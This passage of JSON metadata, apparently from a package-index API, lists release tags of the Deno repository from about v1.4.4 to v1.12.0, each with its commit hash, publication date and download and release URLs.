e.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%